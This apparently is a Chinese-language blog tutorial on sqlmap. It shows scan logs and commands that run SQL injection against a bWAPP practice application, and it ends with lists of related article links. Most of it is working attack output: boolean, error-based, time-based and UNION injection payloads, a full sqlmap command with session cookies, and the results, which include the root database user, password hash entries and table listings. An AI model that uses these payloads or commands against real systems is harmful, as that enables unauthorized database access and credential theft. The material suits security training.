[18:15:50] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[18:15:50] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
[18:15:50] [INFO] testing 'MySQL >= 5.6 error-based - Parameter replace (GTID_SUBSET)'
[18:15:50] [INFO] testing 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)'
[18:15:50] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[18:15:50] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[18:15:50] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[18:15:50] [INFO] testing 'MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (BIGINT UNSIGNED)'
[18:15:50] [INFO] testing 'MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (EXP)'
[18:15:51] [INFO] testing 'MySQL >= 5.6 error-based - ORDER BY, GROUP BY clause (GTID_SUBSET)'
[18:15:51] [INFO] testing 'MySQL >= 5.7.8 error-based - ORDER BY, GROUP BY clause (JSON_KEYS)'
[18:15:51] [INFO] testing 'MySQL >= 5.0 error-based - ORDER BY, GROUP BY clause (FLOOR)'
[18:15:51] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (EXTRACTVALUE)'
[18:15:52] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (UPDATEXML)'
[18:15:52] [INFO] testing 'MySQL >= 4.1 error-based - ORDER BY, GROUP BY clause (FLOOR)'
[18:15:52] [INFO] testing 'MySQL inline queries'
[18:15:52] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[18:15:55] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[18:15:59] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[18:16:01] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[18:16:06] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'
[18:16:08] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK)'
[18:16:12] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[18:16:18] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP)'
[18:16:24] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP)'
[18:16:30] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SLEEP)'
[18:16:35] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP - comment)'
[18:16:39] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SLEEP - comment)'
[18:16:42] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP - comment)'
[18:16:46] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP - comment)'
[18:16:49] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (BENCHMARK)'
[18:16:55] [INFO] testing 'MySQL > 5.0.12 AND time-based blind (heavy query)'
[18:17:01] [INFO] testing 'MySQL < 5.0.12 OR time-based blind (BENCHMARK)'
[18:17:06] [INFO] testing 'MySQL > 5.0.12 OR time-based blind (heavy query)'
[18:17:11] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (BENCHMARK - comment)'
[18:17:15] [INFO] testing 'MySQL > 5.0.12 AND time-based blind (heavy query - comment)'
[18:17:18] [INFO] testing 'MySQL < 5.0.12 OR time-based blind (BENCHMARK - comment)'
[18:17:25] [INFO] testing 'MySQL > 5.0.12 OR time-based blind (heavy query - comment)'
[18:17:29] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind'
[18:17:34] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (comment)'
[18:17:38] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP)'
[18:17:43] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP - comment)'
[18:17:46] [INFO] testing 'MySQL AND time-based blind (ELT)'
[18:17:52] [INFO] testing 'MySQL OR time-based blind (ELT)'
[18:17:57] [INFO] testing 'MySQL AND time-based blind (ELT - comment)'
[18:18:01] [INFO] testing 'MySQL OR time-based blind (ELT - comment)'
[18:18:04] [INFO] testing 'MySQL >= 5.1 time-based blind (heavy query) - PROCEDURE ANALYSE (EXTRACTVALUE)'
[18:18:08] [INFO] testing 'MySQL >= 5.1 time-based blind (heavy query - comment) - PROCEDURE ANALYSE (EXTRACTVALUE)'
[18:18:10] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace'
[18:18:10] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)'
[18:18:11] [INFO] testing 'MySQL < 5.0.12 time-based blind - Parameter replace (BENCHMARK)'
[18:18:11] [INFO] testing 'MySQL > 5.0.12 time-based blind - Parameter replace (heavy query - comment)'
[18:18:16] [INFO] testing 'MySQL time-based blind - Parameter replace (bool)'
[18:18:16] [INFO] testing 'MySQL time-based blind - Parameter replace (ELT)'
[18:18:16] [INFO] testing 'MySQL time-based blind - Parameter replace (MAKE_SET)'
[18:18:16] [INFO] testing 'MySQL >= 5.0.12 time-based blind - ORDER BY, GROUP BY clause'
[18:18:16] [INFO] testing 'MySQL < 5.0.12 time-based blind - ORDER BY, GROUP BY clause (BENCHMARK)'
it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n] Y
[18:20:25] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[18:20:25] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[18:20:25] [WARNING] most likely web server instance hasn't recovered yet from previous timed based payload. If the problem persists please wait for a few minutes and rerun without flag 'T' in option '--technique' (e.g. '--flush-session --technique=BEUS') or try to lower the value of option '--time-sec' (e.g. '--time-sec=2')
[18:20:31] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[18:21:10] [INFO] testing 'MySQL UNION query (random number) - 1 to 10 columns'
[18:21:49] [WARNING] GET parameter 'action' does not seem to be injectable
sqlmap identified the following injection point(s) with a total of 3926 HTTP(s) requests:
---
Parameter: title (GET)Type: boolean-based blindTitle: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)Payload: title=Iron Man' OR NOT 5557=5557#&action=search
​Type: error-basedTitle: MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)Payload: title=Iron Man' AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7170707871,(SELECT (ELT(9118=9118,1))),0x71787a6b71,0x78))s), 8446744073709551610, 8446744073709551610)))-- DJGx&action=search
​Type: time-based blindTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP)Payload: title=Iron Man' AND (SELECT 8291 FROM (SELECT(SLEEP(5)))gNKi)-- NqMd&action=search
​Type: UNION queryTitle: MySQL UNION query (NULL) - 7 columnsPayload: title=Iron Man' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x7170707871,0x6a47494c595a48466c44707668676a466a624c61785854647069434e446946536d55717850476941,0x71787a6b71),NULL#&action=search
[18:21:49] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: PHP 5.5.9, Apache 2.4.7
[18:21:49] [INFO] fetched data logged to text files under 'C:\Users\Administrator\AppData\Local\sqlmap\output\8.142.109.131'
​
[*] ending @ 18:21:49 /2022-06-16/

sqlmap使用案例三

说明：

1、扫描bWAPP - Login注入点，并附带cookie，指定数据库类型为mysql，检索DBMS当前用户，检索DBMS当前数据库，枚举DBMS用户密码散列，枚举DBMS数据库表

2、如果之前已经对这个注入点扫描过sqlmap会记住并在下一次扫描时自动读入结果并完成注入请求，这样就减少扫描过程

$ sqlmap -u"http://8.142.109.131:8080/sqli_1.php?title=Iron+Man&action=search" -D "mysql" –-cookie="security=low;grafana_session=d98406ee1386e4964189e699f4ab95aa;PHPSESSID=u4bj5utd41l2t7rlgkdje96mf0;security_level=0" --passwords -v 0 --current-user --current-db --tables

扫描分析过程输出：

$ sqlmap -u"http://8.142.109.131:8080/sqli_1.php?title=Iron+Man&action=search" -D "mysql" –-cookie="security=low;grafana_session=d98406ee1386e4964189e699f4ab95aa;PHPSESSID=u4bj5utd41l2t7rlgkdje96mf0;security_level=0" --passwords -v 0 --current-user --current-db --tables_____H_____ ___[.]_____ ___ ___  {1.6.6#pip}
|_ -| . [']     | .'| . |
|___|_  [(]_|_|_|__,|  _||_|V...       |_|   https://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting @ 12:23:08 /2022-06-17/sqlmap resumed the following injection point(s) from stored session:
---
Parameter: title (GET)Type: boolean-based blindTitle: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)Payload: title=Iron Man' OR NOT 5557=5557#&action=searchType: error-basedTitle: MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)Payload: title=Iron Man' AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7170707871,(SELECT (ELT(9118=9118,1))),0x71787a6b71,0x78))s), 8446744073709551610, 8446744073709551610)))-- DJGx&action=searchType: time-based blindTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP)Payload: title=Iron Man' AND (SELECT 8291 FROM (SELECT(SLEEP(5)))gNKi)-- NqMd&action=searchType: UNION queryTitle: MySQL UNION query (NULL) - 7 columnsPayload: title=Iron Man' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x7170707871,0x6a47494c595a48466c44707668676a466a624c61785854647069434e446946536d55717850476941,0x71787a6b71),NULL#&action=search
---
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL >= 5.5
current user: 'root@localhost'
current database: 'bWAPP'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] y
do you want to perform a dictionary-based attack against retrieved password hashes? [Y/n/q] Y
database management system users password hashes:
[*] admin [1]:password hash: NULL
[*] root [1]:password hash: NULLDatabase: mysql
[24 tables]
+---------------------------+
| user                      |
| columns_priv              |
| db                        |
| event                     |
| func                      |
| general_log               |
| help_category             |
| help_keyword              |
| help_relation             |
| help_topic                |
| host                      |
| ndb_binlog_index          |
| plugin                    |
| proc                      |
| procs_priv                |
| proxies_priv              |
| servers                   |
| slow_log                  |
| tables_priv               |
| time_zone                 |
| time_zone_leap_second     |
| time_zone_name            |
| time_zone_transition      |
| time_zone_transition_type |
+---------------------------+[*] ending @ 12:24:05 /2022-06-17/

欢迎大家关注我的订阅号，会定期分享一些关于测试相关的文章，有问题也欢迎一起讨论学习！

sqlmap工具使用手册相关推荐

1. Myisamchk小工具使用手册

   Myisamchk小工具使用手册 =========================================================== 作者: logzgh(http://logzg ...

2. SQLmap工具常用命令

   SQLmap工具常用命令 SQLmap是一款用来检测与利用SQL注入漏洞的免费开源工具.它有一个非常棒的特性,即对检测与利用进行自动化处理,如获取数据库指纹.访问底层文件系统.执行命令等等.

3. centos7常用工具安装手册

   centos7常用工具安装手册 文章目录 1. CentOS 7安装 ifconfig 2. CentOS 7 上安装vim 3. centos7 安装wget 4. CentOS7下zip解压和un ...

4. tpch测试mysql_MySQL-tpch 测试工具简要手册

   tpch是TPC(Transaction Processing Performance Council)组织提供的工具包.用于进行OLAP测试,以评估商业分析中决策支持系统(DSS)的性能.它包含了一 ...

5. java test使用手册,啄木鸟(woodpecker)自动化测试工具使用手册

   啄木鸟(woodpecker)自动化测试工具使用手册 GitHub下载地址:https://github.com/xudashen/woodpecker 微云下载地址:链接:https://share ...

6. sqlmap工具使用用法详解

   2019独角兽企业重金招聘Python工程师标准>>> sqlmap工具使用用法详解 QLmap是一款用来检测与利用SQL注入漏洞的免费开源工具,有一个非常棒的特性,即对检测与利用的 ...

7. 计算机专业使用的工具,电子投标工具使用手册计算机软件及应用it计算机专业资料.doc...

   电子投标工具使用手册计算机软件及应用it计算机专业资料 国信创新电子[投标工具]使用手册 PAGE 9 TOC \o "1-3" \h \z \u HYPERLINK \l &qu ...

8. tpch测试mysql_MySQL数据库之MySQL-tpch 测试工具简要手册

   本文主要向大家介绍了MySQL数据库之MySQL-tpch 测试工具简要手册 ,通过具体的内容向大家展现,希望对大家学习MySQL数据库有所帮助. tpch是TPC(Transaction Proce ...

9. Android内存泄漏检测工具使用手册

   Android内存泄漏检测工具使用手册 前言 LeakCanary 在Android中接入LeakCanary LeakCanary内存泄漏分析 内存泄漏上报到服务端 Shark Shark分析当前应 ...

最新文章

1. Groovy中的闭包
2. Ruby中对象数组排序
3. 杭电1789贪心java实现
4. 科学证明夜猫子都死得早？稳住，事情不是这样的
5. python定时发送微信消息_Python3 itchat实现微信定时发送群消息的实例代码
6. python的列表操作_在Python中列表的操作
7. java excel 导入导出_java中excel文件的导入和导出
8. 第 45 届国际大学生程序设计竞赛（ICPC）亚洲区域赛（昆明），签到题J Parallel Sort
9. 吴恩达神经网络和深度学习-学习笔记-43-Bounding box 预测 + YOLO算法
10. .net知识和学习方法系列（二十一）CLR-枚举
11. Android框架之EventBus的简单使用
12. 12个免费矢量免抠素材网站
13. 再生龙clonezilla备份系统全过程
14. 教你如何把软件转移到另一台电脑？
15. 计算机上如何查找什么占网速,怎么查看网速被占用（宽带100m但wifi很慢）
16. 给游戏编个故事:《通关游戏设计之道》
17. 谷歌不准备推出 ChatGPT 类聊天产品；Bugzilla 宣布未来计划|极客头条
18. cad lisp 二次抛物线_cad画二次抛物线
19. mac版本的visual studio的快捷键修改_几款高效率的mac软件
20. 高级shell编程笔记(第十三章 系统与管理命令)

热门文章

1. linux下检测USB的热插拨
2. 一元运算符 + 表示正号 - 表示负号
3. 惠州电子计算机职业学校,惠州市十大中专学校排名
4. android 十字架效果实现（水平和垂直滑动）
5. Java程序员修炼之道 人民邮电出版社 吴海星译
6. 2022考研资料每日更新（2021.07.25）
7. 如何在网页中嵌入网易云音乐
8. 「数据库」sql刷题（No.11）
9. Unity中实现相机的跟随
10. WATCHMEN 守望者，好看。